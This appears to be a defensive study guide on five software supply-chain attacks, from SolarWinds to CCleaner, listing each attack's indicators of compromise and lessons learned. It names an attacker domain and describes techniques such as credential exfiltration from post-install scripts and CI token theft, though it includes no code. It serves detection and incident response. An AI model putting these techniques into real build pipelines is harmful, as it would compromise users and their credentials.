1. SolarWinds (2020)
What Happened
Attackers compromised SolarWinds’ build environment and injected malicious code (SUNBURST) into Orion software updates, which were digitally signed and distributed to ~18,000 customers, including government agencies.
Host-Based IOCs
SolarWinds.Orion.Core.BusinessLayer.dllmodified but digitally signed- DLL hash mismatch across environments
- New scheduled task masquerading as Orion services
Network IOCs
- DNS queries to subdomains of
avsvmcloud[.]com - Delayed beaconing (7–14 days post-install)
- HTTPS traffic mimicking legitimate Orion behavior
Behavioral IOCs
- Orion process performing credential dumping
- Lateral movement via SAML token forgery
- Privileged account creation without admin action
IR Challenges
- Malware was signed and trusted
- Extremely long dwell time (~9 months)
- Required coordination with vendor, government, and customers
Lessons Learned
- Code signing ≠ safe
- Behavioral detection > signature detection
- Need for SBOM and build pipeline security
2. Kaseya VSA Attack (2021)
What Happened
Attackers exploited zero-day vulnerabilities in Kaseya VSA, a remote management tool used by MSPs. Malicious updates pushed ransomware to thousands of downstream organizations.
Host-Based IOCs
- Suspicious PowerShell spawned by
Agent.exe - Files renamed with ransomware extensions
- Dropped executable masquerading as VSA update
Network IOCs
- Connections to attacker-controlled IPs immediately after update
- SMB traffic spikes from MSP-managed endpoints
Behavioral IOCs
- Mass encryption events within minutes
- Simultaneous execution across multiple tenants
- VSA agent running commands outside normal maintenance windows
IR Challenges
- One MSP compromise = hundreds of victims
- Required immediate shutdown of VSA servers globally
Lessons Learned
- MSPs are high-value targets
- Patch management tools can become weapons
- Segmentation between management tools and production systems is critical
3. NPM Package Compromises
What Happened
Attackers uploaded malicious JavaScript packages or hijacked maintainer accounts. These packages were automatically pulled into applications during builds.
Host-Based IOCs
- Obfuscated JavaScript in dependencies
- Post-install scripts spawning shell commands
- Unexpected files created during build time
Network IOCs
- Outbound HTTP requests during
npm install - Credential exfiltration to paste sites or cloud storage
- DNS queries from CI/CD servers (abnormal)
Behavioral IOCs
- Builds failing only after dependency updates
- Environment variables accessed by non-build tools
- CI tokens accessed by user-land scripts
IR Challenges
- Open-source trust model
- Deep dependency chains
- Difficult to identify which builds are affected
Lessons Learned
- Dependency pinning is essential
- Continuous dependency scanning required
- SBOM visibility is critical
4. ASUS Live Update Attack (2019)
What Happened
Attackers compromised ASUS update servers and distributed signed malicious firmware/software updates, targeting specific MAC addresses (highly selective attack).
Host-Based IOCs
- Signed ASUS Live Update binaries with hidden payload
- Malware executes only if MAC address matches hardcoded list
- Persistence via firmware-level hooks
Network IOCs
- Encrypted outbound traffic from Live Update process
- No traffic on non-targeted systems (very stealthy)
Behavioral IOCs
- Execution conditional on hardware identifiers
- No visible user impact unless targeted
- Long-term persistence without re-infection
IR Challenges
- Hardware-level trust abuse
- Extremely stealthy targeting
- Many victims never knew they were targets
Lessons Learned
- Firmware updates must be verified independently
- Selective attacks can evade mass detection
- Trust chains must be continuously audited
5. CCleaner (2017)
What Happened
Attackers compromised CCleaner’s build environment and distributed a trojanized but signed version to millions of users.
Host-Based IOCs
- Signed CCleaner installer containing backdoor
- Second-stage payload dropped selectively
- Registry modifications for persistence
Network IOCs
- HTTP beaconing to attacker infrastructure
- C2 embedded in legitimate CCleaner process
Behavioral IOCs
- Normal system utility performing reconnaissance
- Targeted delivery of secondary malware
- Antivirus initially trusts execution
IR Challenges
- Massive user base
- Malware trusted by antivirus initially
- Difficult to separate clean vs infected installs
Lessons Learned
- Build environment security is critical
- Monitoring signed software behavior is mandatory
- Post-incident revocation is complex
| Case | Host IOCs | Network IOCs | Behavioral IOCs |
|---|---|---|---|
| SolarWinds | Signed DLL tampering | avsvmcloud[.]com DNS | Token forgery, stealth beaconing |
| Kaseya | Ransomware via VSA agent | MSP-wide outbound traffic | Simultaneous mass execution |
| NPM | Malicious post-install scripts | CI/CD outbound connections | Credential access during builds |
| ASUS | Signed firmware malware | Rare encrypted traffic | Hardware-targeted execution |
| CCleaner | Trojanized installer | Embedded C2 in utility | Selective second-stage payload |
